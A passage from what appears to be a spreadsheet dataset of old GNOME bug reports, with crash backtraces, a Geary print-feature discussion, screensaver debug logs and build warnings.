mismatched quotes at line 296 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 672 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 673 in ../devel-docs/gnomeui/gnomeui-scan.c
The following files contain translations and are currently not in use.
Please consider adding these to the POTFILES.in file located in the po/
directory.
support/error.c
support/getopt.c
support/popt.c
support/popthelp.c
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
---
Presumably the files should be added to the appropriate POTFILES.{in|skip}
files.</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-461814</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER</t>
  </si>
  <si>
    <t>Allow to specify background color for image slideshow</t>
  </si>
  <si>
    <t>Attached patch allows to specify background color for image slideshow. It also dither images which can be useful on 15bpp display (dithering part might be relevant also when not using a background color it is up to you to decide :).</t>
  </si>
  <si>
    <t>gnome-screensaver-maint</t>
  </si>
  <si>
    <t>GSTREAMER-358891</t>
  </si>
  <si>
    <t>[dvdreadsrc] aborts due to src-&gt;cur_pack == dsi_pack.dsi_gi.nv_pck_lbn assertion failing</t>
  </si>
  <si>
    <t>Version: 2.16.1
What were you doing when the application crashed?
Opening a DVD (not encrypted created with Sonic MyDVD Deluxe)
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.0 2006-09-04 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 70299648 vsize: 0 resident: 70299648 share: 0 rss: 23322624 rss_rlim: 0
CPU usage: start_time: 1159748657 rtime: 0 utime: 175 stime: 0 cutime:160 cstime: 0 timeout: 15 it_real_value: 0 frequency: 11
Backtrace was generated from '/usr/bin/totem'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1225861456 (LWP 8654)]
[New Thread -1265390688 (LWP 8668)]
[New Thread -1250690144 (LWP 8665)]
[New Thread -1242219616 (LWP 8664)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb71047c3 in *__GI___poll () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7277883 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#3  0xb7277bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#4  0xb7baa4c4 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#5  0x080672d8 in main ()
Thread 4 (Thread -1242219616 (LWP 8664)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7363be6 in __nanosleep_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7294382 in g_usleep () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb5f62591 in gst_xvimagesink_event_thread (xvimagesink=0x83fc060)
    at xvimagesink.c:1334
	__PRETTY_FUNCTION__ = gst_xvimagesink_event_thread
#4  0xb729241f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#5  0xb735d504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#6  0xb710e4de in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 3 (Thread -1250690144 (LWP 8665)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb7360816 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb75e4b28 in gst_system_clock_obtain ()
   from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#3  0xb729241f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb735d504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb710e4de in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 2 (Thread -1265390688 (LWP 8668)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb736433b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7f461b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb706a760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
No locals.
#6  0xb706bee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
No locals.
#7  0xb727d1a2 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb727d1d9 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb727d256 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0xb4f2d681 in gst_dvd_read_src_create (pushsrc=0x8486000 
    p_buf=0xb493a394) at dvdreadsrc.c:773
	__txt = 
	__dbg = 
	src = (GstDvdReadSrc *) 0x8486000
	srcpad = 
	__PRETTY_FUNCTION__ = gst_dvd_read_src_create
#11 0xb6f4be85 in gst_push_src_get_type () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#12 0xb6f406e6 in gst_base_src_get_type () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#13 0xb6f42d06 in gst_base_src_get_type () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#14 0xb75e9896 in gst_task_set_lock () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#15 0xb7293d78 in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#16 0xb729241f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#17 0xb735d504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#18 0xb710e4de in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1225861456 (LWP 8654)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb71047c3 in *__GI___poll () from /lib/tls/i686/cmov/libc.so.6
No locals.
#2  0xb7277883 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb7277bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb7baa4c4 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x080672d8 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>wcaskey</t>
  </si>
  <si>
    <t>GEARY-713011</t>
  </si>
  <si>
    <t>GEARY</t>
  </si>
  <si>
    <t>print message</t>
  </si>
  <si>
    <t xml:space="preserve">
---- Reported by adam@yorba.org 2012-05-17 12:03:00 -0700 ----
Original Redmine bug id: 5276
Original URL: http://redmine.yorba.org/issues/5276
Searchable id: yorba-bug-5276
Original author: Adam Dingle
Original description:
Archaic as it seems today I actually wanted to print out an email message I
received in Geary.
---- Additional Comments From geary-maint@gnome.bugs 2013-05-01 11:49:00 -0700 ----
### History
####
#1
Updated by Eric Gregory over 1 year ago
Looks like there's a printing function built into WebKit so this shouldn't be
difficult. Should be as simple as this:
1. Create a new WebView instance and load a special page with the headers and
message HTML (or plain text)
2. When the completion signal is fired call the print function
####
#2
Updated by Christian Dywan over 1 year ago
  * **File** 0001-Add-Print-button-and-print-specific-styles.diff added
I'm thinking we can use media-specific styles to solve this. The patch adds a
button and makes avatars buttons and background color hide when printing.
This is mostly a demonstration of my suggestion. If we agree on this we could
go further and hide collapsed messages from printing as a way to select which
messages to print maybe hide more details like email addresses.
####
#3
Updated by Adam Dingle over 1 year ago
Christian thanks for the patch - it looks like this may not be so hard after
all. I think we should make it easy to print any one single message. Printing
multiple messages at once is less common and less important I think so we
can put that off for later.
I think that printing is relatively rare so I'm inclined not to devote a
precious toolbar button to it. Instead we could add a Print command to the
message menu i.e. the menu opened by the dropdown triangle at the right side
of each message.
####
#4
Updated by Christian Dywan over 1 year ago
  * **File** 0001-Add-Print-button-and-print-specific-styles.diff added
  * **Status** changed from _Open_ to _Review_
I removed the button and instead added it to the menu. Only the respective
message will be printed with background-color removed.
####
#5
Updated by Christian Dywan over 1 year ago
  * **Assignee** set to _Christian Dywan_
####
#6
Updated by Adam Dingle over 1 year ago
  * **File** geary.pdf added
  * **Status** changed from _Review_ to _Open_
  * **Target version** set to _0.2_
Christian
this looks quite promising. I just tried printing out a message to a PDF file.
It doesn't look quite right: in the printed image some of the body text
appears under Date: where there should be just a separator line. (See the
attached PDF). Please investigate.
I still hope we can finish this up soon. Marking this feature for 0.2.
####
#7
Updated by Christian Dywan over 1 year ago
  * **File** 0001-Add-Print-button-and-print-specific-styles.diff added
  * **Status** changed from _Open_ to _Review_
What you were seeing was the preview being mixed up with the full body. This
is fixed now.
I ended up wrapping all the hide styles and the body color in @screen. This
is simpler than manually adding logic to reverse the collapsing/ hiding.
I didn't re-indent all styles - should they be indented? It might seem a
little off compared to most styles though it would be more correct to do so.
####
#8
Updated by Adam Dingle over 1 year ago
OK - this seems to work better. Gravatar icons don't show in the printed
message but we can live with that (or ticket it for later).
In the message menu let's group Print with View Source rather than with Mark
as Unread. Printing and viewing the source are both about viewing a message in
a different way whereas Mark as Unread feels like a different operation
altogether.
Jim can you review and comment on the question about indenting styles?
####
#9
Updated by Christian Dywan over 1 year ago
To clarify: avatars are intentionally disabled to avoid unneeded color print.
Just like background color. It's trivial to change.
Could you make a set of bullet points on your expectations? Then we can
include it in the source as a comment.
####
#10
Updated by Adam Dingle over 1 year ago
Ah I see why you've disabled avatars when printing - yes that makes sense.
It might be cool to print out a black-and-white version of the avatar at some
point but we can certainly live with printing no avatars at all for now.
I'm not sure what you mean by bullet points on [my] expectations - do you
mean features which we'd like to have but won't make the first
implementation? If so I'd rather capture those as tickets in Redmine where
they are more easily visible to everyone.
####
#11
Updated by Christian Dywan over 1 year ago
I mean bullet points of what we expect to happen when you print. So if
somebody looks at the code and wonders if for example missing avatars is a
bug it's documented that we agreed to save color ink.
I'm thinking something like this:
// Printing:
// Single message not collapsed. No menu buttons.
// No background color and no avatars to avoid color print
####
#12
Updated by Jim Nelson over 1 year ago
  * **Category** set to _client_
  * **Priority** changed from _Normal_ to _High_
Re: indentation yes let's indent them for sanity's sake. With #5319 one
possibility is to separate them into different files but I don't think that's
necessary for such a small stylesheet.
I actually think this is so close that you don't need to send another patch
Christian. If Adam is okay with what we have here I'll make the changes
myself and commit. Adam?
####
#13
Updated by Adam Dingle over 1 year ago
Sure that sounds fine.
####
#14
Updated by Jim Nelson over 1 year ago
  * **Status** changed from _Review_ to _5_
  * **Resolution** set to _fixed_
00affcf89a73e8cff7a0d0ef429e286a7b4da814
####
#15
Updated by Anonymous about 1 year ago
  * **Subject** changed from _print message_ to _Gluten Intolerance Is Moan Solitarily fastidious On the level Allergy _
  * **Description** updated (diff)
  * **Category** changed from _client_ to _composer_
  * **Assignee** changed from _Christian Dywan_ to _Charles Lindsay_
  * **Target version** changed from _0.2_ to _0.3.0_
  * **Resolution** changed from _fixed_ to _worksforme_
####
#16
Updated by Charles Lindsay about 1 year ago
  * **Subject** changed from _Gluten Intolerance Is Moan Solitarily fastidious On the level Allergy _ to _print message_
  * **Description** updated (diff)
  * **Category** changed from _composer_ to _client_
  * **Assignee** changed from _Charles Lindsay_ to _Christian Dywan_
  * **Target version** changed from _0.3.0_ to _0.2_
  * **Resolution** changed from _worksforme_ to _fixed_
(Remove spam.)
####
#17
Updated by Anonymous 12 months ago
  * **Subject** changed from _print message_ to _Convalescing provoke BusinessÃ¢â‚¬â„¢S SEO Aid _
  * **Description** updated (diff)
  * **Category** changed from _client_ to _composer_
  * **Assignee** changed from _Christian Dywan_ to _Robert Schroll_
  * **Target version** changed from _0.2_ to _0.2.1_
  * **Resolution** changed from _fixed_ to _wontfix_
####
#18
Updated by Charles Lindsay 12 months ago
  * **Subject** changed from _Convalescing provoke BusinessÃ¢â‚¬â„¢S SEO Aid _ to _print message_
  * **Description** updated (diff)
  * **Category** changed from _composer_ to _client_
  * **Assignee** changed from _Robert Schroll_ to _Christian Dywan_
  * **Target version** changed from _0.2.1_ to _0.2_
  * **Resolution** changed from _wontfix_ to _fixed_
(Boy spammers love this ticket.)
####
#19
Updated by Charles Lindsay 7 months ago
  * **Status** changed from _5_ to _Fixed_
--- Bug imported by chaz@yorba.org 2013-11-21 20:18 UTC  ---
This bug was previously known as _bug_ 5276 at http://redmine.yorba.org/show_bug.cgi?id=5276
Imported an attachment (id=260555)
Imported an attachment (id=260556)
Imported an attachment (id=260557)
Imported an attachment (id=260558)
Unknown milestone unknown in product geary. 
   Setting to default milestone for this product ---.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>geary-maint</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-518941</t>
  </si>
  <si>
    <t>crash in Deskbar: Updates and Reeboot</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Updates and Reeboot
Distribution: Ubuntu 8.04 (hardy)
Gnome Release: 2.21.91 2008-02-13 (Ubuntu)
BugBuddy Version: 2.21.90
System: Linux 2.6.24-10-generic #1 SMP Fri Feb 22 19:08:18 UTC 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Human
Icon Theme: Human
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (13 sec old) ---------------------
ERROR: Could not instantiate Handler subclass __builtin__.LegacyNvidiaDriver from name LegacyNvidiaDriver
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/jockey/detection.py line 379 in get_handlers
    inst = obj(ui)
  File /usr/share/jockey/handlers/nvidia.py line 42 in __init__
    'NoLogo': 'True'})
  File /usr/share/jockey/handlers/nvidia.py line 18 in __init__
    rationale=ui._('This driver is required to fully utilise '
  File /usr/lib/python2.5/site-packages/jockey/xorg_driver.py line 51 in __init__
    description rationale)
  File /usr/lib/python2.5/site-packages/jockey/handlers.py line 601 in __init__
    rationale)
  File /usr/lib/python2.5/site-packages/jockey/handlers.py line 291 in __init__
    assert self._modinfo 'kernel module %s exists' % self.module
AssertionError: kernel module nvidia_legacy exists
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/python2.5/site-packages/deskbar/core/ModuleLoader.py line 167 in load_all
    self.load (f)
  File /usr/lib/python2.5/site-packages/deskbar/core/ModuleLoader.py line 145 in load
    modules = self.import_module (filename)
  File /usr/lib/python2.5/site-packages/deskbar/core/ModuleLoader.py line 130 in import_module
    if not getattr(module has_requirements )():
  File /usr/lib/deskbar-applet/modules-2.20-compatible/epiphany.py line 79 in has_requirements
    if is_preferred_browser(epiphany):
  File /usr/lib/python2.5/site-packages/deskbar/core/BrowserMatch.py line 25 in is_preferred_browser
    if http_handler.find(test) != -1:
AttributeError: 'bool' object has no attribute 'find'</t>
  </si>
  <si>
    <t>midnightflash</t>
  </si>
  <si>
    <t>GNOME-CORE-50451</t>
  </si>
  <si>
    <t>on startup crash while clicking gnome splashscreen</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.1
Synopsis: on startup crash while clicking gnome splashscreen
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core 1.2.1
Description:
clicking the gnome splashscreen on startup as a user.
not as root. (didn't try to force that on root startup)
Debugging information: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0x405945a9 in __wait4 () from /lib/libc.so.6
#0  0x405945a9 in __wait4 () from /lib/libc.so.6
#1  0x405fe824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40090b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  __libc_free (mem=0x6b636162) at malloc.c:3025
#5  0x4040dce2 in g_free () from /usr/lib/libglib-1.2.so.0
#6  0x4041658c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#7  0x805411b in maybe_display_gui ()
#8  0x401dc8b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#9  0x4020ec0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#10 0x4020df4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x4020bcf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x401eee08 in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#13 0x40249d9b in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#14 0x4024ca7f in gtk_window_shutdown () from /usr/lib/libgtk-1.2.so.0
#15 0x401eeda9 in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#16 0x40241fb9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#17 0x805405f in maybe_display_gui ()
#18 0x401dc57e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#19 0x4020ec0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#20 0x4020df4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x4020bcf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x40245c39 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#23 0x401dc4f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#24 0x401db5bf in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40290c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#26 0x4040c987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#27 0x4040cba1 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#28 0x4040d0ee in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#29 0x401db0c6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#30 0x804fe27 in save_session ()
#31 0x4028f958 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#32 0x4040b1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#33 0x4040c987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#34 0x4040d001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#35 0x4040d0ee in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#36 0x401db0c6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#37 0x804fe27 in save_session ()
#38 0x4028f958 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#39 0x4040b1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#40 0x4040c987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#41 0x4040d001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#42 0x4040d0ee in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#43 0x401db0c6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#44 0x804fe27 in save_session ()
#45 0x4028f958 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#46 0x4040b1a0 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#47 0x4040c987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#48 0x4040d001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#49 0x4040d1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#50 0x401dae57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#51 0x805094c in main ()
#52 0x404fab65 in __libc_start_main (main=0x8050740  argc=1 
    ubp_av=0xbffffb94 init=0x804c7c0  fini=0x8056ffc  
    rtld_fini=0x4000df24  stack_end=0xbffffb8c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x405945a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405fe824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40090b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  __libc_free (mem=0x6b636162) at malloc.c:3025
mem = (void *) 0x0
ar_ptr = (arena *) 0x0
p = 0x805eee0
ar_ptr = (arena *) 0x0
p = 0x805eee0
#5  0x4040dce2 in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#6  0x4041658c in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x805411b in maybe_display_gui ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-01-30 16:34 -------
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (piet@localhost.localdomain) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>piet</t>
  </si>
  <si>
    <t>BANSHEE-512857</t>
  </si>
  <si>
    <t>Playback</t>
  </si>
  <si>
    <t>banshee crashes on USB activity</t>
  </si>
  <si>
    <t>In openSuSE 11.0 alpha 1 banshee crashes on USB activity. 
Reported already https://bugzilla.novell.com/show_bug.cgi?id=345450 on 2007-12-02 09:22 MST without much effect.
Example: start banshee and run hwinfo. Result:
An unhandled exception was thrown: Exception has been thrown by the target of an invocation.
at System.Reflection.MonoMethod.Invoke (objectSystem.Reflection.BindingFlagsSystem.Reflection.Binderobject[]System.Globalization.CultureInfo) 
at System.Reflection.MethodBase.Invoke (objectobject[]) 
at System.Delegate.DynamicInvokeImpl (object[]) 
at System.MulticastDelegate.DynamicInvokeImpl (object[]) 
at System.Delegate.DynamicInvoke (object[]) 
at NDesk.DBus.Connection.HandleSignal (NDesk.DBus.Message) 
at NDesk.DBus.Connection.DispatchSignals () 
at NDesk.DBus.Connection.Iterate () 
at c__CompilerGenerated0.c__1 (NDesk.GLib.IOChannelNDesk.GLib.IOConditionintptr) 
at (wrapper native-to-managed) c__CompilerGenerated0.c__1 (NDesk.GLib.IOChannelNDesk.GLib.IOConditionintptr) 
in (unmanaged) 0xb7f3d0dc
at (wrapper managed-to-native) Gtk.Application.gtk_main () 
at Gtk.Application.Run () 
at Gnome.Program.Run () 
at Banshee.BansheeEntry.Startup (string[]) 
at (wrapper delegate-invoke) System.MulticastDelegate.invoke_void_string[] (string[]) 
at Banshee.Gui.CleanRoomStartup.Startup (Banshee.Gui.CleanRoomStartup/StartupInvocationHandlerstring[]) 
.NET Version: 2.0.50727.42
Assembly Version Information:
ICSharpCode.SharpZipLib (2.84.0.0)
TagLib (0.0.0.0)
ipod-sharp-ui (0.0.1.0)
System.Web (2.0.0.0)
System.Configuration (2.0.0.0)
glade-sharp (2.10.0.0)
Boo.Lang.Compiler (1.0.0.0)
Banshee.Plugins.Recommendation (0.13.1.26004)
Banshee.Plugins.Radio (0.13.1.26003)
Banshee.Plugins.Podcast (0.13.1.26002)
Banshee.Plugins.NotificationAreaIcon (0.13.1.26001)
Banshee.Plugins.MiniMode (0.13.1.26000)
Banshee.Plugins.MetadataSearch (0.13.1.25999)
Banshee.Plugins.Daap (0.13.1.25999)
Banshee.Plugins.Bookmarks (0.13.1.25998)
Banshee.Plugins.Audioscrobbler (0.13.1.25997)
njb-sharp (0.3.0.24914)
Banshee.Dap.Njb (0.13.1.25997)
gnome-vfs-sharp (2.16.0.0)
Banshee.Dap.MassStorage (0.13.1.25997)
ipod-sharp (0.0.1.0)
Banshee.Dap.Ipod (0.13.1.25996)
Banshee.MediaEngine.GStreamer (0.13.1.25996)
System.Xml (2.0.0.0)
System.Transactions (2.0.0.0)
gconf-sharp (2.16.0.0)
System.Data (2.0.0.0)
Mono.Data.SqliteClient (2.0.0.0)
pango-sharp (2.10.0.0)
Mono.Cairo (2.0.0.0)
Hal (0.0.0.0)
Banshee.Widgets (0.13.1.25992)
Last.FM (0.0.0.0)
NDesk.DBus (1.0.0.0)
Mono.Posix (2.0.0.0)
NDesk.DBus.GLib (1.0.0.0)
gnome-sharp (2.16.0.0)
gdk-sharp (2.10.0.0)
System (2.0.0.0)
atk-sharp (2.10.0.0)
glib-sharp (2.10.0.0)
gtk-sharp (2.10.0.0)
Banshee.Base (0.13.1.25994)
banshee (0.13.1.25995)
mscorlib (2.0.0.0)
Platform Information: Linux 2.6.24-rc8-git2-5-default i686 i386 GNU/Linux
Disribution Information:
[/etc/lsb-release]
LSB_VERSION=core-2.0-noarch:core-3.0-noarch:core-2.0-ia32:core-3.0-ia32
[/etc/SuSE-release]
openSUSE 11.0 (i586) Alpha1
VERSION = 11.0
This also happens when plugging USB devices etc.
Notebook: Fujitsu Siemens Amilo Si 1520
Graphics: Fujitsu Siemens Mobile 945GM/GMS/GME 943/940GML Express
Monitor:  QUANTADISPLAY LCD Monitor 1280x800@60Hz
Wireless: Intel PRO/Wireless 3945ABG Network Connection
Sound:    82801G (ICH7 Family) High Definition Audio Controller
Desktop:  gnome2-SuSE-10.3-145
YaST GUI: yast2-qt-2.16.18-4
OS:       openSUSE 11.0 (i586) Alpha1 VERSION = 11.0
Kernel:   2.6.24-rc8-git2-5-default
rpm -qa | grep banshee | sort
banshee-0.13.1-99
banshee-devel-0.13.1-99
banshee-engine-gst-0.13.1-99
banshee-plugins-DAAP-0.13.1-99
banshee-plugins-default-0.13.1-99
banshee-plugins-extra-0.13.1-99</t>
  </si>
  <si>
    <t>casualprogrammer</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-156044</t>
  </si>
  <si>
    <t>There is a bug in bugzilla.gnome.org</t>
  </si>
  <si>
    <t>When loggin into Bugzilla I am able to click below on 'My Bugs' but after a
while I get 404 errors because of pages not found:
http://bugzilla.gnome.org/reports/buglist.cgi?bug_status=UNCONFIRMED&amp; .....
I noticed that it should NOT belong to /reports/
http://bugzilla.gnome.org/buglist.cgi?bug_status=UNCONFIRMED&amp;
Works.</t>
  </si>
  <si>
    <t>GNOME-SCREENSAVER-332576</t>
  </si>
  <si>
    <t>screensaver activates too early after wake-up from sleeping</t>
  </si>
  <si>
    <t>Please describe the problem:
After launching it works fine.
But after the laptop sleep and then wake up screensaver works abnormally.
Specifically it activates too early.
Even when i am typing some letters or moving mouse pointer it activates.
Once this problem occurs the solution is just `killall gnome-screensaver &amp;&amp;
gnome-screensaver'.
Steps to reproduce:
1. sleep laptop
2. wake up laptop
3. 
Actual results:
sometimes screensaver activates too early
Expected results:
screensaver should wait a given time to activate
Does this happen every time?
almost always
if sleep time is too short (about 1-2 min)it seems not to happen.
Other information:
Here is my debug information from gnome-screensaver --no-daemon --debug
[_gs_watcher_notice_activity] gs-watcher-x11.c:565 (13:45:33):   Activity
detected: resetting timers
[remove_idle_timer] gs-watcher-x11.c:461 (13:45:33):     killing idle_timer 
(300000 176)
[add_idle_timer] gs-watcher-x11.c:474 (13:45:33):        starting idle_timer
(290000 177)
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:33):   Idle 0
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:33):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_notice_window_created] gs-watcher-x11.c:586 (13:45:33):     Window
created: noticing activity on 0xE49B2A
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:35):   Idle 2
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:35):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:37):   Idle 4
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:37):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:39):   Idle 6
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:39):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:41):   Idle 8
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:41):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:43):   Idle 10
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:43):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:45):   Idle 12
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:45):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:47):   Idle 14
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:47):         checking wall
clock for hibernation changed: 0:00:02
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:49):   Idle 16
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:49):         checking wall
clock for hibernation changed: 0:00:02
[idle_timer] gs-watcher-x11.c:1239 (13:45:51):   in idle timer
[_gs_watcher_check_pointer_position] gs-watcher-x11.c:1389 (13:45:51):   Idle 18
seconds
[check_for_clock_skew] gs-watcher-x11.c:1308 (13:45:51):         checking wall
clock for hibernation changed: 0:00:02
[watcher_idle_cb] gs-monitor.c:110 (13:45:51):   Idle signal detected: 1
[gs_listener_set_session_idle] gs-listener-dbus.c:364 (13:45:51):        Setting
session idle: 1
[listener_check_activation] gs-listener-dbus.c:257 (13:45:51):   Checking for
activation
